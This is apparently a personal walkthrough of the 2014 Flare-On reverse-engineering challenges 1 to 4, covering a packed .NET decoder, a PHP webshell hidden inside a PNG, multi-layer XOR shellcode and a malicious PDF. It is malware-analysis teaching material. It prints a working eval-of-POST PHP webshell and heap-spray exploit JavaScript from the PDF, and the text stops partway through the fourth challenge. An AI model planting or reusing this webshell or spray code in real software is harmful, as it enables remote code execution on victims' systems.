Category: Malware Analysis and Reverse Engineering
Difficulty: Easy/Medium/Hard
File:- 2014_FLAREOn_Challenges.zip

Challenge 1 - Bob Doge#

Stage 1 Extracting CAB File#

Initial Triage#

File Type: PE32+ executable for MS Windows 5.02 (GUI), x86-64, 6 sections
Size: 279 KB
SHA256: f8aac4d0cccabd11d7b10d63dc2acc451ea832077650971d3c66834861162981

Basic Static Analysis:#

Detect it Easy (Die) show that this file is self-extracted CAB/SFX style packing, where the executable includes a compressed Microsoft Cabinet file (CAB) and extracts/executes it at runtime and it is just a wrapper/loader.
The .rsrc section is compressed, which is why the tool flags high entropy, classic sign of packing or encryption.
Compression algorithm used inside the CAB is LZX (as shown), which is common in Microsoft CAB archives.
So we have to first extract the actual exe from this and analyze it,

Pasted image 20260118140836.png

Pasted image 20260118141726.png

We can extract it using cabextract tool, and it will written in Challenge1.exe file,

1
┌──(b14cky㉿DESKTOP-VRSQRAJ)-[/]
2
└─$ cabextract C1.exe.defused
3
Extracting cabinet: C1.exe.defused
4
  extracting Challenge1.exe
5

6
All done, no errors.

Stage 2 Analysis of .NET Sample#

Initial Triage#

File Type: PE32 executable for MS Windows 4.00 (GUI), Intel i386 Mono/.Net assembly, 3 sections
Size: 118 KB
SHA256: c1b55c829a8420fa41e7a31344b6427045cea288458fe1c0f32cae47b2e812f2

Basic Static Analysis:#

Detect it Easy (Die) show that this file is .NET binary written in C# using visual studio.
Also .text is packed as per die because it show high entropy in it.

Pasted image 20260118142239.png

Pasted image 20260118142850.png

We know that this code compiles to Microsoft Intermediate Language (MSIL or IL).
IL is a human-readable, high-level assembly-like language, not raw CPU instructions.
So we can read it using tools such as dnSpy, Dotpeek etc.
here is the example of IL,

1
.method public hidebysig static void Main() cil managed
2
{
3
    .entrypoint
4
    ldstr "Hello, world!"
5
    call void [mscorlib]System.Console::WriteLine(string)
6
    ret
7
}

Code Analysis#

Pasted image 20260118143113.png

I used dnSpy for this analysis,
In Resources i found something phishy which is rev_challenge_1.dat_secret.encode so i saved it and it looks like encrypted data,
Also some cool memes 😂,

Pasted image 20260118143314.png

Pasted image 20260118143648.png

Now Let’s dive into actual code, so typically we start with main function in Program section,
This code just starts a Windows Forms GUI app and opens Form1 so Form1 is the one we had to go,

Pasted image 20260118143831.png

Immediately we see one function btnDecode_Click which do some kind of math or crypto stuff, and it is loading that rev_challenge_1.dat_secret.encode file as input.

Pasted image 20260118144043.png

At first glance, honestly, I can’t understand this code, so I take help from our friend GPT to explain it to me, and here is what I understand,

1
0xa1 0xb5 0x44        (original)
2
0x1a 0x5b 0x44        (swap hex digits)
3
(0x1a ^ 0x29) (0x5b ^ 0x29) (0x44 ^ 0x29) → 0x33 0x72 0x6d

Flag Extraction#

So i load this input file into CyberChef and apply all the necessary filters and features to get decrypted result and here it is,

Pasted image 20260118145903.png

Here is out flag,

1
 3rmahg3rd.b0b.d0ge@flare-on.com

Here is recipe of this,

1
[
2
  { "op": "To Hex",
3
    "args": ["Space", 0] },
4
  { "op": "Remove whitespace",
5
    "args": [true, true, true, true, true, false] },
6
  { "op": "Find / Replace",
7
    "args": [{ "option": "Regex", "string": "([0-9a-fA-F])([0-9a-fA-F])" }, "$2$1", true, false, true, false] },
8
  { "op": "Remove whitespace",
9
    "args": [true, true, true, true, true, false] },
10
  { "op": "From Hex",
11
    "args": ["Auto"] },
12
  { "op": "XOR",
13
    "args": [{ "option": "Decimal", "string": "41" }, "Standard", false] }
14
]

Here is the similar py script for doing this same task,

1
#!/usr/bin/env python3
2
"""
3
Replicates CyberChef operations:
4
1. From Hexdump
5
2. To Hex (space delimited)
6
3. Remove whitespace
7
4. Find/Replace (swap hex digit pairs)
8
5. Remove whitespace
9
6. From Hex
10
7. XOR with 41 (decimal)
11
"""
12

13
import re
14
import sys
15

16
def from_hexdump(data):
17
    """Extract hex bytes from hexdump format"""
18
    lines = data.strip().split('\n')
19
    hex_bytes = []
20

21
    for line in lines:
22
        # Remove offset and ASCII representation, keep only hex bytes
23
        parts = line.split()
24
        for part in parts:
25
            # Skip offset (contains colon) and non-hex parts
26
            if ':' in part or not all(c in '0123456789abcdefABCDEF' for c in part):
27
                continue
28
            # Add hex bytes (typically 2 chars each)
29
            for i in range(0, len(part), 2):
30
                if i + 1 < len(part):
31
                    hex_bytes.append(part[i:i+2])
32

33
    return bytes.fromhex(''.join(hex_bytes))
34

35
def to_hex_space(data):
36
    """Convert bytes to space-separated hex"""
37
    return ' '.join(f'{b:02x}' for b in data)
38

39
def remove_whitespace(text):
40
    """Remove all whitespace"""
41
    return re.sub(r'\s+', '', text)
42

43
def swap_hex_pairs(text):
44
    """Swap each pair of hex digits: AB -> BA"""
45
    return re.sub(r'([0-9a-fA-F])([0-9a-fA-F])', r'\2\1', text)
46

47
def from_hex(hex_string):
48
    """Convert hex string to bytes"""
49
    return bytes.fromhex(hex_string)
50

51
def xor_decrypt(data, key):
52
    """XOR each byte with the key"""
53
    return bytes(b ^ key for b in data)
54

55
def main():
56
    input_file = 'rev_challenge_1.dat_secret.encode'
57

58
    try:
59
        # Read input file in binary mode
60
        with open(input_file, 'rb') as f:
61
            data = f.read()
62

63
        print(f"[+] Reading from {input_file}")
64

65
        # Step 1: From Hexdump - skip this step, data is already binary
66
        print("[+] Step 1: Using binary data directly")
67
        step1 = data
68

69
        # Step 2: To Hex (space delimited)
70
        print("[+] Step 2: To Hex (space delimited)")
71
        step2 = to_hex_space(step1)
72

73
        # Step 3: Remove whitespace
74
        print("[+] Step 3: Remove whitespace")
75
        step3 = remove_whitespace(step2)
76

77
        # Step 4: Find/Replace - swap hex digit pairs
78
        print("[+] Step 4: Swap hex digit pairs")
79
        step4 = swap_hex_pairs(step3)
80

81
        # Step 5: Remove whitespace (again)
82
        print("[+] Step 5: Remove whitespace")
83
        step5 = remove_whitespace(step4)
84

85
        # Step 6: From Hex
86
        print("[+] Step 6: From Hex")
87
        step6 = from_hex(step5)
88

89
        # Step 7: XOR with 41 (decimal)
90
        print("[+] Step 7: XOR with 41")
91
        result = xor_decrypt(step6, 41)
92

93
        # Output result
94
        print("\n" + "="*60)
95
        print("DECODED OUTPUT:")
96
        print("="*60)
97
        try:
98
            print(result.decode('utf-8', errors='replace'))
99
        except:
100
            print(result)
101
        print("="*60)
102

103
        # Save to file
104
        output_file = 'decoded_output.txt'
105
        with open(output_file, 'wb') as f:
106
            f.write(result)
107
        print(f"\n[+] Output saved to {output_file}")
108

109
    except FileNotFoundError:
110
        print(f"[!] Error: File '{input_file}' not found")
111
        print(f"[!] Please ensure the file exists in the current directory")
112
        sys.exit(1)
113
    except Exception as e:
114
        print(f"[!] Error: {e}")
115
        import traceback
116
        traceback.print_exc()
117
        sys.exit(1)
118

119
if __name__ == '__main__':
120
    main()

Challenge 2: Javascrap#

Stage 0 Character Table Construction#

Initial Triage#

Challenge Type: Reverse-Engineering / Web / Obfuscated Code
Files Provided:
- home.html
  - File Type: home.html: HTML document, Unicode text, UTF-8 text, with very long lines (1428), with CRLF line terminators
  - Size: 8.17 KB
  - SHA256: d1b235e49336c2e510100bd3ffa3113d9c757ffb4829e9564597dbab8338b710
- img/flare-on.png (PNG image)
  - File Type: img/flare-on.png: PNG image data, 400 x 79, 8-bit/color RGBA, non-interlaced
  - Size: 9.33 KB
  - SHA256: 87528d13f40b51b6de90124fb92bcbc38a54e5241cd7ef969208c0707ed893dd

Basic Static Analysis:#

The PNG is being included as PHP code via an include in the HTML page: i.e., the challenge hides a PHP script inside what looks like an image.

Pasted image 20260119201225.png

Performing strings on flare-on.png reveals appended PHP source code instead of pure image data.

Pasted image 20260119201531.png

The appended PHP contains two large arrays: $terms and $order, and a reconstruction loop that builds a second PHP script dynamically.

Stage 1: Obfuscation Decoding#

1: Character Table Reconstruction#

The embedded PHP begins:

Pasted image 20260119202546.png

1
$terms = array("M","Z","]","p",...,"|");
2
$order = array(59,71,73,13,...,47);
3
$do_me="";
4
for($i=0;$i<count($order);$i++){
5
    $do_me=$do_me.$terms[$order[$i]];
6
}
7
print($do_me);

$terms is a custom character lookup table - each entry is a single character.
$order is a list of integers, each an index into $terms.
The loop concatenates $terms[$order[i]] to form a complete PHP script string in $do_me.
Instead of running eval() immediately, you can replace it with print to dump the generated code for analysis.

Stage 2: Second-Layer Decoding#

After reconstructing the inner PHP, the output looks like:

Pasted image 20260119202723.png

1
$_  = 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlc ...';
2
$__ = 'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';
3
$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
4
eval($___($__));

$_ and $__ are Base64-encoded strings.
$___ is obfuscated with hex escape sequences representing the string base64_decode.
eval($___($__)) resolves to:

1
$code = base64_decode($_);
2
eval($code);

This decodes the next stage of the script and executes it.

Stage 3: Escaped Payload Interpretation#

Pasted image 20260119202813.png

The inner decoded PHP is:

1
if (isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F..."])){
2
    eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104..."]));
3
}

The $_POST key names are obfuscated using a mix of octal (\NNN) and hex (\xNN) escapes.
To understand the actual identifier, all escape sequences must be converted into ASCII.

Stage 4: Normalization and Flag Extraction#

Pasted image 20260119202842.png

The decoded sequence:

1
a11DOTthatDOTjava5crapATflareDASHonDOTcom

comes from interpreting those escape sequences as numbers and converting them to characters.
Replace placeholder tokens:

DOT → .
AT → @
DASH → -
Final flag:

1
a11.that.java5crap@flare-on.com

Final Behavior#

The decoded PHP callback becomes:

1
if (isset($_POST["a11.that.java5crap@flare-on.com"])) {
2
    eval(base64_decode($_POST["a11.that.java5crap@flare-on.com"]));
3
}

This is a simple PHP webshell that executes Base64-encoded PHP from an HTTP POST field if sent under the correct key.

Challenge 3:#

Stage 1 Extracting Shellcode from Wrapper EXE#

Initial Triage#

File Type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Size: 7 KB
SHA256: 4ab2023b2f34c8c49ffd15a051b46b6be13cb84775142ec85403a08c0d846c72

Basic Static Analysis#

Detect it Easy (Die) show that this file is C Compiled File, and Tiny C compiler was used to compile it, also it can be stripped as per file command results.
In Entropy section we can see that there is only 2 section which is .text and .data,

Pasted image 20260121104440.png

Pasted image 20260121104830.png

PEStudio Shows that most of data is on .text section and raw-size is 6144 bytes,

Pasted image 20260121105229.png

Advance Static Analysis#

I have used IDA Free to do disassemble the exe file,
- In that i opened start function which has some interesting functions and particularly this sub_401000,

Pasted image 20260121105432.png

In this sub_401000 function, there are multiple bytes which are being pushed into stack and at the end it being called using this instruction,

Pasted image 20260121110122.png

1
.text:00401000 ; int __cdecl sub_401000(_DWORD, _DWORD, _DWORD)
2
.text:00401000 sub_401000      proc near               ; CODE XREF: start+6A↓p
3
.text:00401000
4
.text:00401000 var_201         = byte ptr -201h
5
.text:00401000 var_200         = byte ptr -200h
6
...
7
.text:00401000                 push    ebp
8
.text:00401001                 mov     ebp, esp
9
.text:00401003                 sub     esp, 204h
10
.text:00401009                 nop
11
.text:0040100A                 mov     eax, 0E8h
12
.text:0040100F                 mov     [ebp+var_201], al
13
.text:00401015                 mov     eax, 0
14
.text:0040101A                 mov     [ebp+var_200], al
15
...
16
.text:00402492                 mov     [ebp+var_1], al
17
.text:00402495                 lea     eax, [ebp+var_201]
18
.text:0040249B                 call    eax

It means it means it can shellcode because 0E8h is being pushed, it means call target,
but why this importent,
- Shellcode has a huge problem: It does NOT know its own address
  - it can be placed anywhere in memory
  - no imports
  - no fixed base
  - no PE headers

Advanced Dynamic Analysis#

So to extract the shellcode we will use x32dbg because we have 32 bit binary and put a breakpoint in this particular 0040249B offset which is call eax so we will dump EAX into memory and carve it and move further.
But first we land in entry point of program,

1
004024C0 | 55                       | push ebp
2
004024C1 | 89E5                     | mov ebp,esp
3
004024C3 | 81EC 2C000000            | sub esp,2C

Pasted image 20260121111145.png

So we can go to that location using CTRL + G shortcut,

Pasted image 20260121111257.png

We will put breakpoint using using F2 in that instruction,

1
00402495 | 8D85 FFFDFFFF            | lea eax,dword ptr ss:[ebp-201]
2
0040249B | FFD0                     | call eax
3
0040249D | B8 00000000              | mov eax,0

Pasted image 20260121111432.png

So now we will run till this breakpoint and dump the EAX content inside the dump windows,
And again we can see that there is E8 00 00.. format which means it will be shellcode so we can dump this using this command,

1
savedata "C:\Users\Asus\Desktop\shellcode.bin", EAX, 0x4000

Pasted image 20260121111909.png

Pasted image 20260121112242.png

So it will be written in shellcode.bin,

Stage 2 Analyzing Shellcode#

Initial Triage#

File Type: data
Size: 16 KB
SHA256: 7d60f98eaa49863a604f75425ced94f86faf2eb9d83e0c1ce7490c852930f44e

Advance Static Analysis#

To get the hex code we can use HxD tool and copy from there and I used cutter for this analysis because it gives graph view, so paste it into that cutter,

Pasted image 20260121113255.png

I remove some bytes which are not that important, after 0xC995,

1
E8 00 00 00 00 8B 34 24 83 C6 1C B9 DF 01 00 00 83 F9 00 74 07 80 36 66 46 49 EB F4 E9 10 00 00 00 07 08 02 46 15 09 46 0F 12 46 04 03 01 0F 08 15 0E 13 15 66 66 0E 15 07 13 14 0E 08 09 16 07 EF 85 8E 66 66 66 66 ED 52 42 E5 A0 4B EF 97 E7 A7 EA 67 66 66 EF BE E5 A6 6C 5F BE 13 63 EF 85 E5 A5 62 5F A8 12 6E EC 75 56 70 25 20 8D 8D 8F 57 66 66 66 6F 6C 62 27 67 62 72 70 6A 35 7C 66 36 60 70 73 33 7A 7C 65 2F 6C 72 27 66 68 33 70 72 78 66 29 7E 66 67 63 33 7D 7D 35 7C 61 73 27 65 66 7A 7A 67 FD 08 09 16 07 9E 33 37 97 D5 0B B1 31 17 07 15 84 EA 14 6D 1B 89 3F 74 48 79 40 90 D2 17 96 E1 0D FD EA FA C8 7F 53 71 5A E9 CE 74 48 79 40 E1 CB EF C2 02 34 45 61 48 20 5F 3C 07 3F 0C 23 1B 3B 0D 28 05 7B 1E 3E 02 2F 09 60 1E 20 10 3E 16 7A ED AD 9C 48 79 40 71 D0 4B 76 E9 80 57 C9 86 C9 BE 85 71 5A 64 C7 AC CB B9 58 48 83 0A 57 E3 A5 F9 83 73 71 B1 27 79 D0 77 7E 62 0B 3F AB 9A B2 62 52 6A 46 66 58 73 00 38 15 39 00 21 5F 25 15 24 1E 32 1E 1F 5B 70 42 7A 1A 7B 18 7E 10 75 15 60 55 3A 55 0D 60 78 17 61 4D 7C 5A 7A 46 26 40 65 0D 31 0B 6F 4B 72 09 71 52 D8 D1 E3 72 0B 2A 17 A4 30 18 DC FA 2F B6 E7 F0 94 06 16 2D 16 F2 CE A2 8A 3D 37 B8 63 21 9B DF 81 ED 40 18 CC 59 03 F5 43 54 06 7C 4B 8D F8 63 E4 F2 5A 76 FA 4A E6 53 62 90 66 13 FF 0C 60 88 4D 38 FF 5E F1 77 7B 7D 40 E1 F0 8E 7B 7C 5B D4 30 39 2A 9E F6 38 49 1F F0 28 99 95 4B F2 61 DB 62 D0 56 48 05 22 12 29 8A D2 45 49 20 75 0D 3F 48 AC F3 29 52 07 A3 34 BB 7F 05 98 10 58 72 C8 E6 67 9D E0 75 88 1B 66 55 73 76 24 1C 7F 19 0D 46 2F 25 35 14 8D 80 B2 2E 4B 01 80 32 1C 95 C9 00

Pasted image 20260121113539.png

It is loop that doing some stuff,
- The CALL instruction is not for calling a function
- It is used to steal the current address so the code can decrypt and execute itself.
- So it means call 5 will pushes 0x00000005 onto stack jumps to 0x00000005 now stack has [rsp] = address_of_shellcode then mov esi, [rsp] will push it into esi which means 0x05 + 0x1C = 0x21,
seg000:00000021 to seg000:00000030 is encrypted block,

Pasted image 20260121121437.png

1
0x00000000      call    5          ;  fcn.00000000(void)
2
0x00000005      mov     esi, dword [rsp]
3
0x00000008      add     esi, 0x1c
4
0x0000000b      mov     ecx, 0x1df
5
0x00000010      cmp     ecx, 0

Decryption block with key 0x66

1
0x00000015  xor byte [rsi], 0x66
2
0x00000018  jmp 0x10

So here is the whole summarized flow,

1
call → pop → add offset → xor loop (key 0x66) → jump

Pasted image 20260121113604.png

Possible Pseudocode,

1
base = get_rip();
2
payload = base + 0x1c;
3

4
for (i = 0; i < 0x1df; i++) {
5
    payload[i] ^= 0x66;
6
}
7

8
jump_to(payload);

There is one block which is encrypted so i used, cyberchef to decrypt it with key 0x66

Pasted image 20260121120858.png

Pasted image 20260121120739.png

Decrypted String 1,

1
and so it begins

But you can see how tedious is this task in static analysis so to do this easiness we can use dynamic method.

Advanced Dynamic Analysis#

Again, i can use x32dgb for this task,

Layer 1 XORed Encryption#

This loop is doing decryption of encrypted text

1
0019FD43 | 83F9 00                  | cmp ecx,0
2
0019FD46 | 74 07                    | je 19FD4F
3
0019FD48 | 8036 66                  | xor byte ptr ds:[esi],66
4
0019FD4B | 46                       | inc esi
5
0019FD4C | 49                       | dec ecx
6
0019FD4D | EB F4                    | jmp 19FD43

Pasted image 20260121132031.png

1
0019FD53 00 61 6E 64 20 73 6F 20 69 74 20 62 65 67 69 6E  .and so it begin
2
0019FD63 73 68 75 73 00 00 68 73 61 75 72 68 6E 6F 70 61  shus..hsaurhnopa

Decrypted String 1,

1
so it begins

Layer 2 XORed Encryption#

for next layer just step through the instructions by doing step over,
This instructions are loading layer 2 decryption key in stack which is

1
0019FD69 | 68 73617572              | push 72756173
2
0019FD6E | 68 6E6F7061              | push 61706F6E
3
0019FD73 | 89E3                     | mov ebx,esp

Here is actual key in hex 6E 6F 70 61 72 73 61 75 72 75 73 which is nopasaurus,

Pasted image 20260121133313.png

Pasted image 20260121132418.png

Now the actual loop begins and decryption starts using this key nopasaurus,

1
0019FD8D | 39D8                     | cmp eax,ebx
2
0019FD8F | 75 05                    | jne 19FD96
3
0019FD91 | 89E3                     | mov ebx,esp
4
0019FD93 | 83C3 04                  | add ebx,4
5
0019FD96 | 39CE                     | cmp esi,ecx
6
0019FD98 | 74 08                    | je 19FDA2
7
0019FD9A | 8A13                     | mov dl,byte ptr ds:[ebx]
8
0019FD9C | 3016                     | xor byte ptr ds:[esi],dl
9
0019FD9E | 43                       | inc ebx
10
0019FD9F | 46                       | inc esi
11
0019FDA0 | EB EB                    | jmp 19FD8D

Pasted image 20260121133701.png

1
0019FDA6 00 67 65 74 20 72 65 61 64 79 20 74 6F 20 67 65  .get ready to ge
2
0019FDB6 74 20 6E 6F 70 27 65 64 20 73 6F 20 64 61 6D 6E  t nop'ed so damn
3
0019FDC6 20 68 61 72 64 20 69 6E 20 74 68 65 20 70 61 69   hard in the pai
4
0019FDD6 6E 74 E8 00 00 00 00 8B 34 24 83 C6 1E B9 38 01  ntè.....4$.Æ.¹8.

Decrypted String 2,

1
get ready to get nop'ed so damn hard in the paint

Layer 3 XORed Encryption#

This is where 3rd loop starts and decryption starts with hardcoded hex 0x624F6C47,

Pasted image 20260121135337.png

1
0019FDE3 | B9 38010000              | mov ecx,138
2
0019FDE8 | 83F9 00                  | cmp ecx,0
3
0019FDEB | 7E 0E                    | jle 19FDFB
4
0019FDED | 8136 624F6C47            | xor dword ptr ds:[esi],476C4F62
5
0019FDF3 | 83C6 04                  | add esi,4
6
0019FDF6 | 83E9 04                  | sub ecx,4
7
0019FDF9 | EB ED                    | jmp 19FDE8

This wrote some gibberish in memory,

1
0019FDF6 83 E9 04 EB ED 8D 80 00 00 00 00 8D 80 00 00 00  .é.ëí...........
2
0019FE06 00 90 90 90 90 68 72 3F 21 3F 68 20 6F 76 65 68  .....hr?!?h oveh
3
0019FE16 6D 6F 73 74 68 74 20 61 6C 68 69 73 20 69 68 6F  mostht alhis iho
4
0019FE26 6D 67 20 89 E3 E8 00 00 00 00 8B 34 24 83 C6 2D  mg .ãè.....4$.Æ-

After spending some time i realize that it is actually strings which is being loaded next,

Pasted image 20260121135106.png

1
0019FE0B | 68 723F213F              | push 3F213F72
2
0019FE10 | 68 206F7665              | push 65766F20
3
0019FE15 | 68 6D6F7374              | push 74736F6D
4
0019FE1A | 68 7420616C              | push 6C612074
5
0019FE1F | 68 69732069              | push 69207369
6
0019FE24 | 68 6F6D6720              | push 20676D6F
7
0019FE29 | 89E3                     | mov ebx,esp

Pasted image 20260121135559.png

I take all hex convert it in Big endian format and arrange it in FILO (First in Last out) order because it is loaded in stack so here is the strings,
Interestingly this same text used as key for next layer.

1
omg i sit almost over?!?

Pasted image 20260121135835.png

Layer 4 XORed Encryption#

Here is loop which start with previous string as key for decryption routine,

1
0019FE43 | 39D8                     | cmp eax,ebx
2
0019FE45 | 75 05                    | jne 19FE4C
3
0019FE47 | 89E3                     | mov ebx,esp
4
0019FE49 | 83C3 04                  | add ebx,4
5
0019FE4C | 39CE                     | cmp esi,ecx
6
0019FE4E | 74 08                    | je 19FE58
7
0019FE50 | 8A13                     | mov dl,byte ptr ds:[ebx]
8
0019FE52 | 3016                     | xor byte ptr ds:[esi],dl
9
0019FE54 | 43                       | inc ebx
10
0019FE55 | 46                       | inc esi
11
0019FE56 | EB EB                    | jmp 19FE43

Pasted image 20260121140344.png

1
0019FE56 EB EB E9 1D 00 00 00 73 75 63 68 2E 35 68 33 31  ëëé....such.5h31
2
0019FE66 31 30 31 30 31 30 31 40 66 6C 61 72 65 2D 6F 6E  1010101@flare-on
3
0019FE76 2E 63 6F 6D 68 6E 74 00 00 68 20 73 70 65 68 20  .comhnt..h speh

Pasted image 20260121140451.png

Here is Final Flag… 😗

1
such.5h311010101@flare-on.com

Challenge 4:#

Stage 1 Malicious PDF Analysis#

Initial Triage#

File Type: APT9001.pdf: PDF document, version 1.5
Size: 21 KB
SHA256: 15f3d918c4781749e3c9f470740485fa01d58fd0b003e2f0be171d80ce3b1c2c

Basic Static Analysis#

Detect it Easy show nothing,
I do quick search its hash on VT this is the result,

Pasted image 20260125231735.png

27 out of 65 is pretty high so maybe there is some data which is embedded in PDF.

Pasted image 20260125231924.png

So to check that i used pdfinfo tool to see metadata of pdf and here is what is got,
- It has some js stuff so we can extract it using tool called, peepdf.

Pasted image 20260125232218.png

Advance Static Analysis#

1
┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~]
2
└─$ python2 /opt/peepdf/peepdf.py -fil APT9001.pdf
3

4
Warning: PyV8 is not installed!!
5
Warning: pylibemu is not installed!!
6
Warning: Python Imaging Library (PIL) is not installed!!
7

8
File: APT9001.pdf
9
MD5: f2bf6b87b5ab15a1889bddbe0be0903f
10
SHA1: 58c93841ee644a5d2f5062bb755c6b9477ec6c0b
11
SHA256: 15f3d918c4781749e3c9f470740485fa01d58fd0b003e2f0be171d80ce3b1c2c
12
Size: 21284 bytes
13
Version: 1.5
14
Binary: True
15
Linearized: False
16
Encrypted: False
17
Updates: 0
18
Objects: 8
19
Streams: 2
20
URIs: 0
21
Comments: 0
22
Errors: 1
23

24
Version 0:
25
        Catalog: 1
26
        Info: No
27
        Objects (8): [1, 2, 3, 4, 5, 6, 7, 8]
28
                Errors (1): [8]
29
        Streams (2): [6, 8]
30
                Encoded (2): [6, 8]
31
                Decoding errors (1): [8]
32
        Objects with JS code (1): [6]
33
        Suspicious elements:
34
                /OpenAction (1): [1]
35
                /JS (1): [5]
36
                /JavaScript (1): [5]
37
                Adobe JBIG2Decode Heap Corruption (CVE-2009-0658): [8]

I tried to extract the JS code using extract js > extracted.js which appeared to be successful.
Also this is mind, “Adobe JBIG2Decode Heap Corruption (CVE-2009-0658)”

1
PPDF> extract js
2

3
// peepdf comment: Javascript code located in object 6 (version 0)
4

5
var HdPN = "";
6
var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = "";
7
var IxTUQnOvHg = unescape("%u72f9%u4649%u1.....u5740%ud0ff");
8
var MPBPtdcBjTlpvyTYkSwgkrWhXL = "";
9

10
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 128; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA >= 0; --EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791");
11
ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg;
12
OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791");
13
fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20;
14
fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA = fJWhwERSDZtaZXlhcREfhZjCCVqFAPS + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv.length
15
while (OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length < fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA) OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY += OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY;
16
UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
17
MOysyGgYplwyZzNdETHwkru = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length - fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
18
while (MOysyGgYplwyZzNdETHwkru.length + fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA < 0x40000) MOysyGgYplwyZzNdETHwkru = MOysyGgYplwyZzNdETHwkru + MOysyGgYplwyZzNdETHwkru + UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb;
19
DPwxazRhwbQGu = new Array();
20
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 0; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA < 100; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) DPwxazRhwbQGu[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = MOysyGgYplwyZzNdETHwkru + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv;
21

22
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 142; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA >= 0; --EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += unescape("%ub550%u0166");
23
bGtvKT = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length + 20
24
while (zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length < bGtvKT) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
25
Juphd = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, bGtvKT);
26
QCZabMzxQiD = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length - bGtvKT);
27
while (QCZabMzxQiD.length + bGtvKT < 0x40000) QCZabMzxQiD = QCZabMzxQiD + QCZabMzxQiD + Juphd;
28
FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE = new Array();
29
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 0; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA < 125; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = QCZabMzxQiD + zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;

But this looks obfuscated and very messy so I cleaned it,

1
// peepdf comment: Javascript code located in object 6 (version 0)
2

3
var string_variable_2 = "";
4
var string_variable_4 = unescape("%u72f9%u4649%u152....5740%ud0ff");
5
var string_variable_1 = "";
6

7
for (counter_variable = 128; counter_variable >= 0; --counter_variable) string_variable_1 += unescape("%ub32f%u3791");
8
string_variable_3 = string_variable_1 + string_variable_4;
9
string_variable_5 = unescape("%ub32f%u3791");
10

11

12
while (string_variable_5.length < 790) string_variable_5 += string_variable_5;
13

14
substring1_of_str5 = string_variable_5.substring(0, 790);
15
substring2_of_str5 = string_variable_5.substring(0, string_variable_5.length - 790);
16

17
while (substring2_of_str5.length + 790 < 262144) substring2_of_str5 = substring2_of_str5 + substring2_of_str5 + substring1_of_str5;
18
another_array_variable = new Array();
19

20
for (counter_variable = 0; counter_variable < 100; counter_variable++)
21
  another_array_variable[counter_variable] = substring2_of_str5 + string_variable_3;
22

23
for (counter_variable = 142; counter_variable >= 0; --counter_variable)
24
  string_variable_2 += unescape("%ub550%u0166");
25

26
len_str2_plus20 = string_variable_2.length + 20
27

28
while (string_variable_2.length < len_str2_plus20) string_variable_2 += string_variable_2;
29

30
substring1_of_str2 = string_variable_2.substring(0, len_str2_plus20);
31
substring2_of_str2 = string_variable_2.substring(0, string_variable_2.length - len_str2_plus20);
32

33
while (substring2_of_str2.length + len_str2_plus20 < 262144) substring2_of_str2 = substring2_of_str2 + substring2_of_str2 + substring1_of_str2;
34
